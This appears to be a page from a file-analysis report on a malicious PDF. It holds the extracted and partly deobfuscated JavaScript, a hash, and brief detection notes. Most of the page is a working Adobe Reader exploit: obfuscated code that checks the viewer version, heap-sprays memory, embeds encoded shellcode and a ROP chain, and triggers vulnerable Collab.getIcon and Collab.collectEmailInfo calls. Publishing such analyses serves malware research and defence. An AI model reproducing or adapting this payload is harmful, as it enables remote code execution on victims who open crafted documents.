while(bk["l\x65\x6e\x67\x74\x68"]+wap<262144) bk = bk+bk+fillbk;
mm = new Array()//ahplgha[
for (i=0;i<250;i++) mm[i] = bk + blah;
plin = rep(8000, unes("\x25\x75\x30a\x30a\x25\x75\x30a\x30a"));
if (app["\x76\x69\x65\x77\x65\x72\x56\x65\x72\x73\x69\x6F\x6E"] >= 6.0)//gakghfvlgfal
{
Collab.collectEmailInfo({subj:0,msg:plin});
}
}
function exp() {
var jkdhg=app
if(app["\x76\x69\x65\x77\x65\x72\x56\x65\x72\x73\x69\x6F\x6E"] >= 8.0)
{
zzzzzzzz();
}
else{
zzzzzzzzzzzzzzzz();
}
}
if(app.viewerVersion>=9.00)
{
var LbWxSqgNmAwjUaoXaywhlH
if(app.viewerVersion > 100)
{
for(i = 0; i<1000; i++)
LbWxSqgNmAwjUaoXaywhlH = LbWxSqgNmAwjUaoXaywhlH +0x120;
}
else
{ var LbWxSqgNmAwjUaoXaywhlH =unescape}
var TCfIpiOxOYTTeNgDQsDQaDtVjQ;
for(i=0;i<18000;i++)
TCfIpiOxOYTTeNgDQsDQaDtVjQ = TCfIpiOxOYTTeNgDQsDQaDtVjQ+0x70;
var TCfIpiOxOYTTeNgDQsDQaDtVjQ = LbWxSqgNmAwjUaoXaywhlH(strexchg("%u0C0C%u0C0C%u4919%u0700%u12bb%u0700%u1022%u0700%u0C0C%u0C0C%u0C0C%u0C0C%u1599%u0700%u0124%u0001%u72f7%u0700%u0104%u0001%u15bb%u0700%u1000%u0000%u154d%u0700%u15bb%u0700%u0300%u7ffe%u7fb2%u0700%u15bb%u0700%u0011%u0001%ua8ac%u0700%u15bb%u0700%u0100%u0001%ua8ac%u0700%u72f7%u0700%u0011%u0001%u52e2%u0700%u5c54%u0700%uffff%uffff%u0100%u0001%u0000%u0000%u0104%u0001%u1000%u0000%u0040%u0000%ud731%u0700%u15bb%u0700%u905a%u9054%u154d%u0700%ua722%u0700%u15bb%u0700%ueb5a%u5815%u154d%u0700%ua722%u0700%u15bb%u0700%u1a8b%u1889%u154d%u0700%ua722%u0700%u15bb%u0700%uc083%u8304%u154d%u0700%ua722%u0700%u15bb%u0700%u04c2%ufb81%u154d%u0700%ua722%u0700%u15bb%u0700%u0C0C%u0C0C%u154d%u0700%ua722%u0700%u15bb%u0700%uee75%u05eb%u154d%u0700%ua722%u0700%u15bb%u0700%ue6e8%uffff%u154d%u0700%ua722%u0700%u15bb%u0700%u90ff%u9090%u154d%u0700%ua722%u0700%u15bb%u0700%u9090%u9090%u154d%u0700%ua722%u0700%u15bb%u0700%u9090%u9090%u154d%u0700%ua722%u0700%u15bb%u0700%uffff%u90ff%u154d%u0700%ud731%u0700%u112f%u0700%u3030%u3030%u0C0c" +
"%u14eb%ub258%u8a98%u3218%u88da%u4018%u3881%udada%udada%uf175%u05eb%ue7e8%uffff%u64ff%u17f0%u806a%uf0f9%u7e23%ua2b7%uc9f0%u3ab7%uf099%u7aa1%u1be5%uc2f0%ubc4c%uf00c%u0e2a%uc3cf%u7bf0%uff0f%uf019%ufecf%u6795%u03f0%u131f%uf07d%uae2a%u8b97%udbf0%u3426%uf043%u8b16%u3492%uaaf0%u09ec%u1394%u1b6c%ud874%u6413%u4aab%u4aab%u13fc%ua8c2%ud313%u1394%u84d1%uf113%u1390%ub8d9%u9113%uc8a0%ued80%u356b%u13f8%ua4dd%ud413%ue09d%u559b%uc113%u9bb8%u1345%u80e1%u13d7%u23ac%u6d9b%u9701%u9e26%u5ca2%u90ec%u5259%u9b9f%ude48%u6973%ucca3%u84bc%u7ced%uc113%u9bbc%ufe45%ua413%u13e3%u84c1%u459b%ub49b%u0d23%u33c7%uf9cf%u17a5%u806a%uedf9%u132c%u1b74%ue074%ue511%uf264%uc69c%ucecc%ucf67%u1148%u48dd%u601b%ued67%u1b9e%u9c5e%u73ce%ua574%ub898%u9898%u6bee%u98f2%u98f2%uf8f0%u989b%uce98%ucf67%u154c%u7cdd%u98f2%uf2c8%u158c%u70dd%ucec8%ucf67%u1d40%uec58%u194a%u70e5%uf7e8%uedf1%u51ed%ue519%ua574%ucff7%ued16%u1158%u70ed%udd13%u9b60%u6cdd%udd9b%u1168%u74dd%uf2c8%u67d8%u74cf%udd11%u1d7c%u9758%u961c%u9899%u1598%u78dd%u98f2%u67c8%u74ed%ued67%uce7c%ucf67%u1d40%u9758%u6e1c%u9898%uce98%ucf67%u1378%u7cc5%uc59b%u1168%u78c5%uc59b%u116c%u44c5%ud513%ua860%u93d4%u7a67%u1962%u9c74%u9899%ucc98%u9cf0%u9899%u6798%u68cf%u581d%u1c97%u985b%u9898%ufd11%u9b40%u135c%u1360%u7ced%ud513%u6b68%u133c%u64e5%u9af2%ued67%u6740%u70cf%udd11%u1b4c%u6760%u1c97%u9805%u9898%ued67%u676c%u78ed%u67c8%u7ccf%ued67%u674c%u78cf%ued67%u6740%u54cf%ucf67%ud844%u6013%u511b%u2867%u6aba%u6a36%u1336%u5f6c%ufb9e%ufcf5%u5fb6%u9cde%ue0fd%ub8fd%ude5f%ub790%ub8fb%u1bba%u945e%u51ab%u9c12%ua497%uecba%u109e%u969c%u73d9" +
"%u156b%u9684%u9b5e%uf298%uce98%ue513%u6764%u70cf%u5ffe%uba9b%u1198%u70dd%u601b%uec67%u67ac%u48ed%ud8f2%ucf67%u1174%u4cdd%u581d%ubdec%u6013%ued13%u1344%u60d5%u3c6b%ue513%u6764%u48ed%u67c8%u70ed%ucf67%u677c%u70ed%ucf67%uf278%u6798%u40ed%ucf67%u676c%u60cf%u98f2%u67c8%u64cf%udada%udada"));
var XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV = LbWxSqgNmAwjUaoXaywhlH(strexchg("%u0c0C%u0c0c"));
while (XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV["l\x65\x6e\x67\x74\x68"] +28 < 65536)
XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV+=XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV;
KamKpVdorBTYgaOYYulKQswCiJyjvhZksBoGyWoNohJhsqyPygdvFvAalRntpAyIGDrzYxVhTGNylo = XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, (3084-36)/2);
KamKpVdorBTYgaOYYulKQswCiJyjvhZksBoGyWoNohJhsqyPygdvFvAalRntpAyIGDrzYxVhTGNylo += TCfIpiOxOYTTeNgDQsDQaDtVjQ;
KamKpVdorBTYgaOYYulKQswCiJyjvhZksBoGyWoNohJhsqyPygdvFvAalRntpAyIGDrzYxVhTGNylo += XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV;
KoHQQkRIckZJKtdlKTGyUUS = KamKpVdorBTYgaOYYulKQswCiJyjvhZksBoGyWoNohJhsqyPygdvFvAalRntpAyIGDrzYxVhTGNylo["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, 65536/2);
while(KoHQQkRIckZJKtdlKTGyUUS["l\x65\x6e\x67\x74\x68"] < 524288) KoHQQkRIckZJKtdlKTGyUUS += KoHQQkRIckZJKtdlKTGyUUS;
bdfzsvuobNyDZnrqvFjkFWMnGaDbvlYCKTfwjiCwLEXKoTngADhROnZManDz = KoHQQkRIckZJKtdlKTGyUUS["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, 524288-4120/2) //ashlfajl;afj
var JkNUxvkKFXvIXewntXRjnLOytMONPyrcUEpPSGrzHuBijVDY = new Array()//ip[wo][]
for(tYzswEF=0;tYzswEF<0x80;tYzswEF++) JkNUxvkKFXvIXewntXRjnLOytMONPyrcUEpPSGrzHuBijVDY[tYzswEF]=bdfzsvuobNyDZnrqvFjkFWMnGaDbvlYCKTfwjiCwLEXKoTngADhROnZManDz+"s";
//shklfh
//ahf;lajf;
}
else
{
exp();
}
|
|||
js_property_alias_stage_000.js |
deobfuscated-js | JavaScript property alias normalized stage at offset 0x5C5E6 | 10826 bytes |
SHA-256: 770f3d14299f289ef61f7495b00277afb2432b33dde4bf157f1fa3dba8f7ba38 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 eval/decoder/string-building token(s). 73 of 92 identifiers look randomly generated (e.g. 'WRJJ15bbWRJJ0700WRJJc083WRJJ8304WRJJ154d') — consistent with name-mangling obfuscation. Carved artifact contains 2 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
var sc
for(i=0;i<18000;i++)
sc=sc+0x60
var unes
if(app["viewerVersion"] > 100)
{
for(i=0;i<18000;i++)
unes=unes+0x63
}
else
{unes= unescape}
var strTempA="byteToChar";
var strTempB="getIcon";
var strTempC="collectEmailInfo";
function rep(count,what){
var v = "";
while (--count >= 0) v += what;
return v;
}
function strexchg(sc){
var re = /WRJJ/g;
sc = sc.replace(re,"%u");
return sc;
}
var dsafkljll = '0x';
function myunes(buf) {
var ret =""
for (var x=0;x < buf["length"]; x+=2) {
ret = ret+util[strTempA](Number(dsafkljll + buf["substr"](x,2)));//
}
return ret;
}
sc1=unes(strexchg("%u0C0c" +
"WRJJ14ebWRJJb258WRJJ8a98WRJJ3218WRJJ88daWRJJ4018WRJJ3881WRJJdada" +
"WRJJdadaWRJJf175WRJJ05ebWRJJe7e8WRJJffffWRJJ64ffWRJJ17f0WRJJ806a" +
"WRJJf0f9WRJJ7e23WRJJa2b7WRJJc9f0WRJJ3ab7WRJJf099WRJJ7aa1WRJJ1be5" +
"WRJJc2f0WRJJbc4cWRJJf00cWRJJ0e2aWRJJc3cfWRJJ7bf0WRJJff0fWRJJf019" +
"WRJJfecfWRJJ6795WRJJ03f0WRJJ131fWRJJf07dWRJJae2aWRJJ8b97WRJJdbf0" +
"WRJJ3426WRJJf043WRJJ8b16WRJJ3492WRJJaaf0WRJJ09ecWRJJ1394WRJJ1b6c" +
"WRJJd874WRJJ6413WRJJ4aabWRJJ4aabWRJJ13fcWRJJa8c2WRJJd313WRJJ1394" +
"WRJJ84d1WRJJf113WRJJ1390WRJJb8d9WRJJ9113WRJJc8a0WRJJed80WRJJ356b")
)
;
sc2=unes(strexchg("WRJJ13f8WRJJa4ddWRJJd413WRJJe09dWRJJ559bWRJJc113WRJJ9bb8WRJJ1345" +
"WRJJ80e1WRJJ13d7WRJJ23acWRJJ6d9bWRJJ9701WRJJ9e26WRJJ5ca2WRJJ90ec" +
"WRJJ5259WRJJ9b9fWRJJde48WRJJ6973WRJJcca3WRJJ84bcWRJJ7cedWRJJc113" +
"WRJJ9bbcWRJJfe45WRJJa413WRJJ13e3WRJJ84c1WRJJ459bWRJJb49bWRJJ0d23" +
"WRJJ33c7WRJJf9cfWRJJ17a5WRJJ806aWRJJedf9WRJJ132cWRJJ1b74WRJJe074" +
"WRJJe511WRJJf264WRJJc69cWRJJceccWRJJcf67WRJJ1148WRJJ48ddWRJJ601b" +
"WRJJed67WRJJ1b9eWRJJ9c5eWRJJ73ceWRJJa574WRJJb898WRJJ9898WRJJ6bee" +
"WRJJ98f2WRJJ98f2WRJJf8f0WRJJ989bWRJJce98WRJJcf67WRJJ154cWRJJ7cdd" +
"WRJJ98f2WRJJf2c8WRJJ158cWRJJ70ddWRJJcec8WRJJcf67WRJJ1d40WRJJec58" +
"WRJJ194aWRJJ70e5WRJJf7e8WRJJedf1WRJJ51edWRJJe519WRJJa574WRJJcff7")
)
sc3=unes(strexchg("WRJJed16WRJJ1158WRJJ70edWRJJdd13WRJJ9b60WRJJ6cddWRJJdd9bWRJJ1168" +
"WRJJ74ddWRJJf2c8WRJJ67d8WRJJ74cfWRJJdd11WRJJ1d7cWRJJ9758WRJJ961c" +
"WRJJ9899WRJJ1598WRJJ78ddWRJJ98f2WRJJ67c8WRJJ74edWRJJed67WRJJce7c" +
"WRJJcf67WRJJ1d40WRJJ9758WRJJ6e1cWRJJ9898WRJJce98WRJJcf67WRJJ1378" +
"WRJJ7cc5WRJJc59bWRJJ1168WRJJ78c5WRJJc59bWRJJ116cWRJJ44c5WRJJd513" +
"WRJJa860WRJJ93d4WRJJ7a67WRJJ1962WRJJ9c74WRJJ9899WRJJcc98WRJJ9cf0" +
"WRJJ9899WRJJ6798WRJJ68cfWRJJ581dWRJJ1c97WRJJ985bWRJJ9898WRJJfd11" +
"WRJJ9b40WRJJ135cWRJJ1360WRJJ7cedWRJJd513WRJJ6b68WRJJ133cWRJJ64e5" +
"WRJJ9af2WRJJed67WRJJ6740WRJJ70cfWRJJdd11WRJJ1b4cWRJJ6760WRJJ1c97" +
"WRJJ9805WRJJ9898WRJJed67WRJJ676cWRJJ78edWRJJ67c8WRJJ7ccfWRJJed67")
)
sc4=unes(strexchg("WRJJ674cWRJJ78cfWRJJed67WRJJ6740WRJJ54cfWRJJcf67WRJJd844WRJJ6013" +
"WRJJ511bWRJJ2867WRJJ6abaWRJJ6a36WRJJ1336WRJJ5f6cWRJJfb9eWRJJfcf5" +
"WRJJ5fb6WRJJ9cdeWRJJe0fdWRJJb8fdWRJJde5fWRJJb790WRJJb8fbWRJJ1bba" +
"WRJJ945eWRJJ51abWRJJ9c12WRJJa497WRJJecbaWRJJ109eWRJJ969cWRJJ73d9" +
"WRJJ156bWRJJ9684WRJJ9b5eWRJJf298WRJJce98WRJJe513WRJJ6764WRJJ70cf" +
"WRJJ5ffeWRJJba9bWRJJ1198WRJJ70ddWRJJ601bWRJJec67WRJJ67acWRJJ48ed" +
"WRJJd8f2WRJJcf67WRJJ1174WRJJ4cddWRJJ581dWRJJbdecWRJJ6013WRJJed13" +
"WRJJ1344WRJJ60d5WRJJ3c6bWRJJe513WRJJ6764WRJJ48edWRJJ67c8WRJJ70ed" +
"WRJJcf67WRJJ677cWRJJ70edWRJJcf67WRJJf278WRJJ6798WRJJ40edWRJJcf67" +
"WRJJ676cWRJJ60cfWRJJ98f2WRJJ67c8WRJJ64cfWRJJdadaWRJJdada"));
////////////agjpg;./.gw]\qwgkq
sc=""+sc1+""+sc2+""+sc3+sc4;
function zzzzzzzz() {
blah = rep(128, unes("%u4242%u4242%u4242%u4242%u4242")) + sc;
bbk = unes("%u4242%u4242");
var h="getIcon";
wap = 0x24+blah["length"]
while (bbk["length"]<wap) bbk+=bbk;
fillbk = bbk["substring"](0, wap);
bk = bbk["substring"](0, bbk["length"]-wap);
while(bk["length"]+wap<262144) bk = bk+bk+fillbk;
mm = new Array()//jf;afkla'[
for (i=0;i<350;i++) mm[i] = bk + blah;
of = rep(4096, myunes("0a0a0a0a"));
var a=["_N.bundle"];//next time
var b=5;//shlshgl
Collab.getIcon(of+a[b-b])//ajf[pa';[
}
function zzzzzzzzzzzzzzzz()
{
blah = rep(128, unes("%u4242%u4242%u4242%u4242%u4242")) +""+ sc
bbk = unes("%u4242%u4242");
wap = 20+blah["length"]
while (bbk["length"]<wap) bbk+=bbk;
fillbk = bbk["substring"](0, wap);
bk = bbk["substring"](0, bbk["length"]-wap);
while(bk["length"]+wap<262144) bk = bk+bk+fillbk;
mm = new Array()//ahplgha[
for (i=0;i<250;i++) mm[i] = bk + blah;
plin = rep(8000, unes("%u0a0a%u0a0a"));
if (app["viewerVersion"] >= 6.0)//gakghfvlgfal
{
Collab.collectEmailInfo({subj:0,msg:plin});
}
}
function exp() {
var jkdhg=app
if(app["viewerVersion"] >= 8.0)
{
zzzzzzzz();
}
else{
zzzzzzzzzzzzzzzz();
}
}
if(app.viewerVersion>=9.00)
{
var LbWxSqgNmAwjUaoXaywhlH
if(app.viewerVersion > 100)
{
for(i = 0; i<1000; i++)
LbWxSqgNmAwjUaoXaywhlH = LbWxSqgNmAwjUaoXaywhlH +0x120;
}
else
{ var LbWxSqgNmAwjUaoXaywhlH =unescape}
var TCfIpiOxOYTTeNgDQsDQaDtVjQ;
for(i=0;i<18000;i++)
TCfIpiOxOYTTeNgDQsDQaDtVjQ = TCfIpiOxOYTTeNgDQsDQaDtVjQ+0x70;
var TCfIpiOxOYTTeNgDQsDQaDtVjQ = LbWxSqgNmAwjUaoXaywhlH(strexchg("%u0C0C%u0C0CWRJJ4919WRJJ0700%u12bb%u0700WRJJ1022WRJJ0700%u0C0C%u0C0C" +
"%u0C0C%u0C0CWRJJ1599WRJJ0700WRJJ0124WRJJ0001WRJJ72f7WRJJ0700" +
"WRJJ0104WRJJ0001WRJJ15bbWRJJ0700WRJJ1000WRJJ0000WRJJ154dWRJJ0700" +
"WRJJ15bbWRJJ0700WRJJ0300WRJJ7ffeWRJJ7fb2WRJJ0700WRJJ15bbWRJJ0700" +
"WRJJ0011WRJJ0001WRJJa8acWRJJ0700WRJJ15bbWRJJ0700WRJJ0100WRJJ0001" +
"WRJJa8acWRJJ0700WRJJ72f7WRJJ0700WRJJ0011WRJJ0001WRJJ52e2WRJJ0700" +
"WRJJ5c54WRJJ0700WRJJffffWRJJffffWRJJ0100WRJJ0001WRJJ0000WRJJ0000" +
"WRJJ0104WRJJ0001WRJJ1000WRJJ0000WRJJ0040WRJJ0000"+
"WRJJd731WRJJ0700WRJJ15bbWRJJ0700WRJJ905aWRJJ9054WRJJ154dWRJJ0700WRJJa722"+
"WRJJ0700WRJJ15bbWRJJ0700WRJJeb5aWRJJ5815WRJJ154dWRJJ0700WRJJa722WRJJ0700WRJJ15bbWRJJ0700WRJJ1a8bWRJJ1889WRJJ154dWRJJ0700WRJJa722WRJJ0700"+
"WRJJ15bbWRJJ0700WRJJc083WRJJ8304WRJJ154dWRJJ0700WRJJa722WRJJ0700WRJJ15bbWRJJ0700WRJJ04c2WRJJfb81WRJJ154dWRJJ0700WRJJa722WRJJ0700WRJJ15bb"+
"%u0700%u0C0C%u0C0C%u154d%u0700%ua722%u0700%u15bb%u0700%uee75%u05eb%u154d%u0700%ua722%u0700%u15bb%u0700"+
"%ue6e8%uffff%u154d%u0700%ua722%u0700%u15bb%u0700%u90ff%u9090%u154d%u0700%ua722%u0700%u15bb%u0700%u9090"+
"%u9090%u154d%u0700%ua722%u0700%u15bb%u0700%u9090%u9090%u154d%u0700%ua722%u0700%u15bb%u0700%uffff%u90ff"+
"WRJJ154dWRJJ0700WRJJd731WRJJ0700WRJJ112fWRJJ0700"+
"WRJJ3030WRJJ3030%u0C0c" +
"WRJJ14ebWRJJb258WRJJ8a98WRJJ3218WRJJ88daWRJJ4018WRJJ3881WRJJdada" +
"WRJJdadaWRJJf175WRJJ05ebWRJJe7e8WRJJffffWRJJ64ffWRJJ17f0WRJJ806a" +
"WRJJf0f9WRJJ7e23WRJJa2b7WRJJc9f0WRJJ3ab7WRJJf099WRJJ7aa1WRJJ1be5" +
"WRJJc2f0WRJJbc4cWRJJf00cWRJJ0e2aWRJJc3cfWRJJ7bf0WRJJff0fWRJJf019" +
"WRJJfecfWRJJ6795WRJJ03f0WRJJ131fWRJJf07dWRJJae2aWRJJ8b97WRJJdbf0" +
"WRJJ3426WRJJf043WRJJ8b16WRJJ3492WRJJaaf0WRJJ09ecWRJJ1394WRJJ1b6c" +
"WRJJd874WRJJ6413WRJJ4aabWRJJ4aabWRJJ13fcWRJJa8c2WRJJd313WRJJ1394" +
"WRJJ84d1WRJJf113WRJJ1390WRJJb8d9WRJJ9113WRJJc8a0WRJJed80WRJJ356b" +
"WRJJ13f8WRJJa4ddWRJJd413WRJJe09dWRJJ559bWRJJc113WRJJ9bb8WRJJ1345" +
"WRJJ80e1WRJJ13d7WRJJ23acWRJJ6d9bWRJJ9701WRJJ9e26WRJJ5ca2WRJJ90ec" +
"WRJJ5259WRJJ9b9fWRJJde48WRJJ6973WRJJcca3WRJJ84bcWRJJ7cedWRJJc113" +
"WRJJ9bbcWRJJfe45WRJJa413WRJJ13e3WRJJ84c1WRJJ459bWRJJb49bWRJJ0d23" +
"WRJJ33c7WRJJf9cfWRJJ17a5WRJJ806aWRJJedf9WRJJ132cWRJJ1b74WRJJe074" +
"WRJJe511WRJJf264WRJJc69cWRJJceccWRJJcf67WRJJ1148WRJJ48ddWRJJ601b" +
"WRJJed67WRJJ1b9eWRJJ9c5eWRJJ73ceWRJJa574WRJJb898WRJJ9898WRJJ6bee" +
"WRJJ98f2WRJJ98f2WRJJf8f0WRJJ989bWRJJce98WRJJcf67WRJJ154cWRJJ7cdd" +
"WRJJ98f2WRJJf2c8WRJJ158cWRJJ70ddWRJJcec8WRJJcf67WRJJ1d40WRJJec58" +
"WRJJ194aWRJJ70e5WRJJf7e8WRJJedf1WRJJ51edWRJJe519WRJJa574WRJJcff7" +
"WRJJed16WRJJ1158WRJJ70edWRJJdd13WRJJ9b60WRJJ6cddWRJJdd9bWRJJ1168" +
"WRJJ74ddWRJJf2c8WRJJ67d8WRJJ74cfWRJJdd11WRJJ1d7cWRJJ9758WRJJ961c" +
"WRJJ9899WRJJ1598WRJJ78ddWRJJ98f2WRJJ67c8WRJJ74edWRJJed67WRJJce7c" +
"WRJJcf67WRJJ1d40WRJJ9758WRJJ6e1cWRJJ9898WRJJce98WRJJcf67WRJJ1378" +
"WRJJ7cc5WRJJc59bWRJJ1168WRJJ78c5WRJJc59bWRJJ116cWRJJ44c5WRJJd513" +
"WRJJa860WRJJ93d4WRJJ7a67WRJJ1962WRJJ9c74WRJJ9899WRJJcc98WRJJ9cf0" +
"WRJJ9899WRJJ6798WRJJ68cfWRJJ581dWRJJ1c97WRJJ985bWRJJ9898WRJJfd11" +
"WRJJ9b40WRJJ135cWRJJ1360WRJJ7cedWRJJd513WRJJ6b68WRJJ133cWRJJ64e5" +
"WRJJ9af2WRJJed67WRJJ6740WRJJ70cfWRJJdd11WRJJ1b4cWRJJ6760WRJJ1c97" +
"WRJJ9805WRJJ9898WRJJed67WRJJ676cWRJJ78edWRJJ67c8WRJJ7ccfWRJJed67" +
"WRJJ674cWRJJ78cfWRJJed67WRJJ6740WRJJ54cfWRJJcf67WRJJd844WRJJ6013" +
"WRJJ511bWRJJ2867WRJJ6abaWRJJ6a36WRJJ1336WRJJ5f6cWRJJfb9eWRJJfcf5" +
"WRJJ5fb6WRJJ9cdeWRJJe0fdWRJJb8fdWRJJde5fWRJJb790WRJJb8fbWRJJ1bba" +
"WRJJ945eWRJJ51abWRJJ9c12WRJJa497WRJJecbaWRJJ109eWRJJ969cWRJJ73d9" +
"WRJJ156bWRJJ9684WRJJ9b5eWRJJf298WRJJce98WRJJe513WRJJ6764WRJJ70cf" +
"WRJJ5ffeWRJJba9bWRJJ1198WRJJ70ddWRJJ601bWRJJec67WRJJ67acWRJJ48ed" +
"WRJJd8f2WRJJcf67WRJJ1174WRJJ4cddWRJJ581dWRJJbdecWRJJ6013WRJJed13" +
"WRJJ1344WRJJ60d5WRJJ3c6bWRJJe513WRJJ6764WRJJ48edWRJJ67c8WRJJ70ed" +
"WRJJcf67WRJJ677cWRJJ70edWRJJcf67WRJJf278WRJJ6798WRJJ40edWRJJcf67" +
"WRJJ676cWRJJ60cfWRJJ98f2WRJJ67c8WRJJ64cfWRJJdadaWRJJdada"));
var XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV = LbWxSqgNmAwjUaoXaywhlH(strexchg("WRJJ0c0CWRJJ0c0c"));
while (XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV["length"] +28 < 65536)
XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV+=XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV;
KamKpVdorBTYgaOYYulKQswCiJyjvhZksBoGyWoNohJhsqyPygdvFvAalRntpAyIGDrzYxVhTGNylo = XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV["substring"](0, (3084-36)/2);
KamKpVdorBTYgaOYYulKQswCiJyjvhZksBoGyWoNohJhsqyPygdvFvAalRntpAyIGDrzYxVhTGNylo += TCfIpiOxOYTTeNgDQsDQaDtVjQ;
KamKpVdorBTYgaOYYulKQswCiJyjvhZksBoGyWoNohJhsqyPygdvFvAalRntpAyIGDrzYxVhTGNylo += XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV;
KoHQQkRIckZJKtdlKTGyUUS = KamKpVdorBTYgaOYYulKQswCiJyjvhZksBoGyWoNohJhsqyPygdvFvAalRntpAyIGDrzYxVhTGNylo["substring"](0, 65536/2);
while(KoHQQkRIckZJKtdlKTGyUUS["length"] < 524288) KoHQQkRIckZJKtdlKTGyUUS += KoHQQkRIckZJKtdlKTGyUUS;
bdfzsvuobNyDZnrqvFjkFWMnGaDbvlYCKTfwjiCwLEXKoTngADhROnZManDz = KoHQQkRIckZJKtdlKTGyUUS["substring"](0, 524288-4120/2) //ashlfajl;afj
var JkNUxvkKFXvIXewntXRjnLOytMONPyrcUEpPSGrzHuBijVDY = new Array()//ip[wo][]
for(tYzswEF=0;tYzswEF<0x80;tYzswEF++) JkNUxvkKFXvIXewntXRjnLOytMONPyrcUEpPSGrzHuBijVDY[tYzswEF]=bdfzsvuobNyDZnrqvFjkFWMnGaDbvlYCKTfwjiCwLEXKoTngADhROnZManDz+"s";
//shklfh
//ahf;lajf;
}
else
{
exp();
}
/* static-property-alias-sinks */
unescape('%u9090%u9090');Collab.getIcon(
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.